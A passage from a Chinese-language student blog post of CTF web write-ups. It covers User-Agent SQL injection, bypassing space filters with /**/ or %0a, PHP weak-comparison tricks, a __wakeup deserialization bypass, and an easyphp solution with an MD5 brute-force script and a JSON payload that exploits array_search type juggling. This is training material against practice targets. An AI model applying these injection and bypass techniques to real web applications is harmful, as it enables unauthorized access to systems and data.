                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310182210186.bmp"
                      alt="capture_20231018220603654"
                ></p>
<p>内容</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310182211510.bmp"
                      alt="capture_20231018220612468"
                ></p>
<p>得到flag~</p>
<hr>
<ul>
<li><h4 id="UA注入"><a href="#UA注入" class="headerlink" title="UA注入"></a>UA注入</h4></li>
</ul>
<p>只是注入的位置不同罢了，其他地方跟上一题 <del>一毛</del> 一样</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310182219686.bmp"
                      alt="capture_20231018221827392"
                ></p>
<hr>
<ul>
<li><h4 id="绕过空格"><a href="#绕过空格" class="headerlink" title="绕过空格"></a>绕过空格</h4></li>
</ul>
<p>绕过空格过滤的方式： &#x2F;**&#x2F;、()、%0a</p>
<p>此处是&#x2F;**&#x2F;</p>
<p>剩下的也跟前面一模一样</p>
<p><code>ctfhub&#123;54bd448e20d488e5958f1fae&#125;</code>        </p>
<p>得到flag~</p>
<hr>
<h2 id="4-PHP-Part1"><a href="#4-PHP-Part1" class="headerlink" title="4.PHP-Part1"></a>4.PHP-Part1</h2><h4 id="攻防世界-simple-php-简单"><a href="#攻防世界-simple-php-简单" class="headerlink" title="攻防世界 - simple_php- 简单"></a>攻防世界 - simple_php- 简单</h4><p>可以读出a弱等于0且a为真，那a肯定不能直接等于0，但因为是弱等于所以“0e”开头就能把“a&#x3D;&#x3D;0”打发了</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310182302153.png"
                      alt="image-20231018230257015"
                ></p>
<p>之后b不能是纯数字又要大于1234（不纯就在后面加点别的乱七八糟的东西，反正比较的时候这些会被删掉且只留下前面的数字）</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310182312797.png"
                      alt="image-20231018231208438"
                ></p>
<p>得到flag~</p>
<hr>
<h4 id="攻防世界-unserialize3-中等"><a href="#攻防世界-unserialize3-中等" class="headerlink" title="攻防世界 unserialize3 -中等"></a>攻防世界 unserialize3 -中等</h4><p>首先根据标题知道是与“反序列化”有关</p>
<p>打开靶场环境</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310201056302.bmp"
                      alt="img"
                ></p>
<ol>
<li>并没有发现序列化之类的函数</li>
<li>括号没有补全，说明这只是一部分代码，<code>unserialize()</code>等应该没有被显示出来</li>
<li>根据 <code>?code</code> 可知需要我们传参数，猜测后面进行反序列化的对象应该就是<code>code</code>，故应该给它传一个已经被序列化的参数</li>
<li>看到<code>__wakeup()</code> 方法。执行<code>unserialize()</code>函数之前会先查找调用<code>__wakeup()</code>，此处执行后会返回<code>bad request</code>，说明我们需要绕过它</li>
</ol>
<p>绕过机制：利用<code>序列化输出的对象个数大于实际值时导致之后的反序列化异常从而绕过__wakeup()</code></p>
<p>所以，我们传入的参数需要是 <strong>改大对象个数的序列化输出</strong> </p>
<p>步骤：</p>
<ol>
<li>获得正确的序列化输出</li>
</ol>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310201118424.png"
                      alt="image-20231020111858202"
                ></p>
<p>​	2.更改输出的对象个数，传参</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310201121532.png"
                      alt="image-20231020112112522"
                ></p>
<p>​	3.得到flag~</p>
<hr>
<h4 id="攻防世界-easyphp-中等"><a href="#攻防世界-easyphp-中等" class="headerlink" title="攻防世界 easyphp -中等"></a>攻防世界 easyphp -中等</h4><p>一关关过</p>
<p>1、要求a：非空、值大于6000000、长度不超过3</p>
<p>​	在最短的长度下满足最大值的要求——科学计数法</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310201450822.png"
                      alt="image-20231020145030864"
                ></p>
<p>2、要求b：非空、MD5加密密文后6位为<code>&#39;8b184b&#39;</code></p>
<p>​	MD5碰撞，写一个小脚本</p>
<div class="highlight-container" data-rel="Php"><figure class="iseeu highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">for</span>(<span class="variable">$b</span>=<span class="number">1</span>;<span class="variable">$b</span>&lt;=<span class="number">100000000</span>;<span class="variable">$b</span>++)&#123;</span><br><span class="line">    <span class="variable">$MD5</span> = <span class="title function_ invoke__">md5</span>(<span class="variable">$b</span>);</span><br><span class="line">    <span class="keyword">if</span>(<span class="title function_ invoke__">preg_match</span>(<span class="string">&#x27;/^8b184b/&#x27;</span>,<span class="title function_ invoke__">substr</span>(<span class="variable">$MD5</span>,-<span class="number">6</span>,<span class="number">6</span>)))&#123;      <span class="comment">//注意格式 &#x27;/^8b184b/&#x27;</span></span><br><span class="line">        <span class="keyword">echo</span> <span class="string">&quot;明文：&quot;</span>,<span class="variable">$b</span>,<span class="string">&quot;\n&quot;</span>;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">&quot;密文：&quot;</span>,<span class="variable">$MD5</span>;</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></div>

<p><del>头铁</del>撞出来啦</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310201449522.png"
                      alt="image-20231020144924953"
                ></p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310201454214.bmp"
                      alt="img"
                ></p>
<p>3、要求c：数组、JSON</p>
<p><del>打开菜鸟教程并</del>搜索JSON，发现这是一种格式，最后转化即可。</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310201503371.png"
                      alt="image-20231020150331110"
                ></p>
<p>4、 要求c[“m”]：非数字、大于2022</p>
<div class="highlight-container" data-rel="Php"><figure class="iseeu highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">!<span class="title function_ invoke__">is_numeric</span>(@<span class="variable">$c</span>[<span class="string">&quot;m&quot;</span>]) &amp;&amp; <span class="variable">$c</span>[<span class="string">&quot;m&quot;</span>] &gt; <span class="number">2022</span></span><br></pre></td></tr></table></figure></div>

<p>‘不是数字’：包含几个字母</p>
<p>‘大于2022’：数字与字符串比较时，字符串会先转换成整型或浮点型： 				</p>
<p>​					 		字母开头→转化成0</p>
<p>​					 		字母结尾→删去字母</p>
<p>故：<code>c[&quot;m&quot;]=&#39;20221abc&#39;</code></p>
<div class="highlight-container" data-rel="Json"><figure class="iseeu highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">JSON<span class="punctuation">:</span></span><br><span class="line"><span class="string">&quot;c&quot;</span>=<span class="punctuation">&#123;</span></span><br><span class="line">	<span class="attr">&quot;m&quot;</span><span class="punctuation">:</span><span class="string">&quot;20221abc&quot;</span><span class="punctuation">,</span></span><br><span class="line">    </span><br><span class="line"><span class="punctuation">&#125;</span></span><br><span class="line">    </span><br><span class="line">    </span><br><span class="line">    </span><br><span class="line"></span><br></pre></td></tr></table></figure></div>

<p>5、要求c[“n”]：数组、两个元素、第一个元素c[“n”] [0] 也是数组</p>
<div class="highlight-container" data-rel="Json"><figure class="iseeu highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">JSON<span class="punctuation">:</span></span><br><span class="line"><span class="string">&quot;c&quot;</span>=<span class="punctuation">&#123;</span></span><br><span class="line">    <span class="attr">&quot;m&quot;</span><span class="punctuation">:</span><span class="string">&quot;20221abc&quot;</span><span class="punctuation">,</span></span><br><span class="line">    <span class="attr">&quot;n&quot;</span><span class="punctuation">:</span><span class="punctuation">[</span></span><br><span class="line">        <span class="punctuation">[</span>?<span class="punctuation">]</span><span class="punctuation">,</span></span><br><span class="line">        ?</span><br><span class="line">    <span class="punctuation">]</span></span><br><span class="line"><span class="punctuation">&#125;</span></span><br></pre></td></tr></table></figure></div>

<p>从<code>c[&quot;n&quot;]</code>中搜索<code>&quot;DGGJ&quot;</code>，返回值赋给<code>$d</code>，<code>$d</code>为false返回<code>&quot;no...&quot;</code></p>
<p>BUT 遍历<code>c[&quot;n&quot;]</code>存在<code>&quot;DGGJ&quot;</code>返回<code>&quot;no......&quot;</code></p>
<p>两者似乎矛盾了。。。</p>
<p>此时我们可以尝试绕过函数→<code>array_search()</code> </p>
<p>因为在这个函数里“搜索”实质上进行的是一种“比较”，而字符串与数字的比较机制（见前）：字母开头转换为0，故<code>c[&quot;n&quot;]</code>有一个“0”元素即可</p>
<div class="highlight-container" data-rel="Json"><figure class="iseeu highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">JSON<span class="punctuation">:</span></span><br><span class="line"><span class="string">&quot;c&quot;</span>=<span class="punctuation">&#123;</span></span><br><span class="line">    <span class="attr">&quot;m&quot;</span><span class="punctuation">:</span><span class="string">&quot;20221abc&quot;</span><span class="punctuation">,</span></span><br><span class="line">    <span class="attr">&quot;n&quot;</span><span class="punctuation">:</span><span class="punctuation">[</span></span><br><span class="line">        <span class="punctuation">[</span><span class="number">1</span><span class="punctuation">]</span><span class="punctuation">,</span></span><br><span class="line">        <span class="number">0</span></span><br><span class="line">    <span class="punctuation">]</span></span><br><span class="line"><span class="punctuation">&#125;</span></span><br></pre></td></tr></table></figure></div>

<p>得到flag~</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310201644510.png"
                      alt="image-20231020164406681"
                ></p>
<hr>
<h4 id="ctfshow-web78"><a href="#ctfshow-web78" class="headerlink" title="ctfshow web78"></a>ctfshow web78</h4><p><del>没钱开会员呜呜呜呜</del></p>

        </div>

        
            <div class="post-copyright-info">
                <div class="article-copyright-info-container">
    <ul>
        <li><strong>Title:</strong> week1</li>
        <li><strong>Author:</strong> dawn_r1sing</li>
        <li><strong>Created at
                :</strong> 2023-10-29 14:56:07</li>
        
            <li>
                <strong>Updated at
                    :</strong> 2023-10-29 15:06:09
            </li>
        
        <li>
            <strong>Link:</strong> https://dawnrisingdong.github.io/2023/10/29/week1/
        </li>
        <li>
            <strong>
                License:
            </strong>
            
            This work is licensed under <a class="license" target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh">CC BY-NC-SA 4.0</a>.
            

        </li>
    </ul>
</div>

            </div>
        

        

        

        
            <div class="article-nav">
                
                
                    <div class="article-next">
                        <a class="next"
                        rel="next"
                        href="/2023/10/29/hello-world/"
                        >
                            <span class="title flex justify-center items-center">
                                <span class="post-nav-title-item">Hello World</span>
                                <span class="post-nav-item">Next posts</span>
                            </span>
                            <span class="right arrow-icon flex justify-center items-center">
                                <i class="fa-solid fa-chevron-right"></i>
                            </span>
                        </a>
                    </div>
                
            </div>
        


        
            <div class="comment-container">
                <div class="comments-container pjax">
    <div id="comment-anchor"></div>
    <div class="comment-area-title">
        <i class="fa-solid fa-comments"></i>&nbsp;Comments
    </div>
    

        
            
 
    <div id="waline"></div>
    <script type="module"  data-swup-reload-script>
        import { init } from '/js/libs/waline.mjs';

        function loadWaline() {
            init({
                el: '#waline',
                serverURL: 'https://example.example.com',
                lang: 'zh-CN',
                dark: 'body[class~="dark-mode"]',
                requiredMeta: ['nick','mail'], // cannot customize by theme config, change it yourself
            });
        }

        if ('true') {
            const loadWalineTimeout = setTimeout(() => {
                loadWaline();
                clearTimeout(loadWalineTimeout);
            }, 1000);
        } else {
            window.addEventListener('DOMContentLoaded', loadWaline);
        }
        
    </script>



        
    
</div>

            </div>
        
    </div>

    
        <div class="toc-content-container">
            <div class="post-toc-wrap">
    <div class="post-toc">
        <div class="toc-title">On this page</div>
        <div class="page-title">week1</div>
        <ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E7%AC%AC%E4%B8%80%E5%91%A8%E5%92%8C%E7%AC%AC%E4%BA%8C%E5%91%A8"><span class="nav-text">第一周和第二周</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#1-web%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86"><span class="nav-text">1.web基础知识</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#2-%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86"><span class="nav-text">2.信息收集</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#3-SQL%E6%B3%A8%E5%85%A5-%E6%89%8B%E5%B7%A5%E6%B3%A8%E5%85%A5"><span class="nav-text">3.SQL注入(手工注入)</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#4-PHP-Part1"><span class="nav-text">4.PHP-Part1</span></a></li></ol></li></ol>

    </div>
</div>
        </div>
    
</div>



                

            </div>

            

        </div>

        <div class="main-content-footer">
            <footer class="footer mt-5 py-5 h-auto text-base text-third-text-color relative border-t-2 border-t-border-color">
    <div class="info-container py-3 text-center">
        
        <div class="text-center">
            &copy;
            
              <span>2022</span>
              -
            
            2023&nbsp;&nbsp;<i class="fa-solid fa-heart fa-beat" style="--fa-animation-duration: 0.5s; color: #f54545"></i>&nbsp;&nbsp;<a href="/">dawn_r1sing</a>
        </div>
        
            <script data-swup-reload-script src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
            <div class="relative text-center lg:absolute lg:right-[20px] lg:top-1/2 lg:-translate-y-1/2 lg:text-right">
                
                    <span id="busuanzi_container_site_uv" class="lg:!block">
                        <span class="text-sm">VISITOR COUNT</span>
                        <span id="busuanzi_value_site_uv"></span>
                    </span>
                
                
                    <span id="busuanzi_container_site_pv" class="lg:!block">
                        <span class="text-sm">TOTAL PAGE VIEWS</span>
                        <span id="busuanzi_value_site_pv"></span>
                    </span>
                
            </div>
        
        <div class="relative text-center lg:absolute lg:left-[20px] lg:top-1/2 lg:-translate-y-1/2 lg:text-left">
            <span class="lg:block text-sm">POWERED BY <?xml version="1.0" encoding="utf-8"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg class="relative top-[2px] inline-block align-baseline" version="1.1" id="圖層_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="1rem" height="1rem" viewBox="0 0 512 512" enable-background="new 0 0 512 512" xml:space="preserve"><path fill="#0E83CD" d="M256.4,25.8l-200,115.5L56,371.5l199.6,114.7l200-115.5l0.4-230.2L256.4,25.8z M349,354.6l-18.4,10.7l-18.6-11V275H200v79.6l-18.4,10.7l-18.6-11v-197l18.5-10.6l18.5,10.8V237h112v-79.6l18.5-10.6l18.5,10.8V354.6z"/></svg><a target="_blank" class="text-base" href="https://hexo.io">Hexo</a></span>
            <span class="text-sm lg:block">THEME&nbsp;<a class="text-base" target="_blank" href="https://github.com/EvanNotFound/hexo-theme-redefine">Redefine v2.5.0</a></span>
        </div>
        
        
            <div>
                Blog up for <span class="odometer" id="runtime_days" ></span> days <span class="odometer" id="runtime_hours"></span> hrs <span class="odometer" id="runtime_minutes"></span> Min <span class="odometer" id="runtime_seconds"></span> Sec
            </div>
        
        
            <script data-swup-reload-script>
                try {
                    function odometer_init() {
                    const elements = document.querySelectorAll('.odometer');
                    elements.forEach(el => {
                        new Odometer({
                            el,
                            format: '( ddd).dd',
                            duration: 200
                        });
                    });
                    }
                    odometer_init();
                } catch (error) {}
            </script>
        
        
        
    </div>  
</footer>
        </div>
    </div>

    
        <div class="post-tools">
            <div class="post-tools-container">
    <ul class="article-tools-list">
        <!-- TOC aside toggle -->
        
            <li class="right-bottom-tools page-aside-toggle">
                <i class="fa-regular fa-outdent"></i>
            </li>
        

        <!-- go comment -->
        
            <li class="go-comment">
                <i class="fa-regular fa-comments"></i>
            </li>
        
    </ul>
</div>

        </div>
    

    <div class="right-side-tools-container">
        <div class="side-tools-container">
    <ul class="hidden-tools-list">
        <li class="right-bottom-tools tool-font-adjust-plus flex justify-center items-center">
            <i class="fa-regular fa-magnifying-glass-plus"></i>
        </li>

        <li class="right-bottom-tools tool-font-adjust-minus flex justify-center items-center">
            <i class="fa-regular fa-magnifying-glass-minus"></i>
        </li>

        <li class="right-bottom-tools tool-dark-light-toggle flex justify-center items-center">
            <i class="fa-regular fa-moon"></i>
        </li>

        <!-- rss -->
        

        

        <li class="right-bottom-tools tool-scroll-to-bottom flex justify-center items-center">
            <i class="fa-regular fa-arrow-down"></i>
        </li>
    </ul>

    <ul class="visible-tools-list">
        <li class="right-bottom-tools toggle-tools-list flex justify-center items-center">
            <i class="fa-regular fa-cog fa-spin"></i>
        </li>
        
            <li class="right-bottom-tools tool-scroll-to-top flex justify-center items-center">
                <i class="arrow-up fas fa-arrow-up"></i>
                <span class="percent"></span>
            </li>
        
        
    </ul>
</div>

    </div>

    <div class="image-viewer-container">
    <img src="">
</div>


    

</main>


    
<script src="/js/libs/Swup.min.js"></script>

<script src="/js/libs/SwupSlideTheme.min.js"></script>

<script src="/js/libs/SwupScriptsPlugin.min.js"></script>

<script src="/js/libs/SwupProgressPlugin.min.js"></script>

<script src="/js/libs/SwupScrollPlugin.min.js"></script>

<script src="/js/libs/SwupPreloadPlugin.min.js"></script>

<script>
    const swup = new Swup({
        plugins: [
            new SwupScriptsPlugin({
                optin: true,
            }),
            new SwupProgressPlugin(),
            new SwupScrollPlugin({
                offset: 80,
            }),
            new SwupSlideTheme({
                mainElement: ".main-content-body",
            }),
            new SwupPreloadPlugin(),
        ],
        containers: ["#swup"],
    });
</script>







<script src="/js/tools/imageViewer.js" type="module"></script>

<script src="/js/utils.js" type="module"></script>

<script src="/js/main.js" type="module"></script>

<script src="/js/layouts/navbarShrink.js" type="module"></script>

<script src="/js/tools/scrollTopBottom.js" type="module"></script>

<script src="/js/tools/lightDarkSwitch.js" type="module"></script>

<script src="/js/layouts/categoryList.js" type="module"></script>





    
<script src="/js/tools/codeBlock.js" type="module"></script>




    
<script src="/js/layouts/lazyload.js" type="module"></script>




    
<script src="/js/tools/runtime.js"></script>

    
<script src="/js/libs/odometer.min.js"></script>

    
<link rel="stylesheet" href="/assets/odometer-theme-minimal.css">




  
<script src="/js/libs/Typed.min.js"></script>

  
<script src="/js/plugins/typed.js" type="module"></script>







<div class="post-scripts" data-swup-reload-script>
    
        
<script src="/js/libs/anime.min.js"></script>

        
<script src="/js/tools/tocToggle.js" type="module"></script>

<script src="/js/layouts/toc.js" type="module"></script>

<script src="/js/plugins/tabs.js" type="module"></script>

    
</div>


</body>
</html>
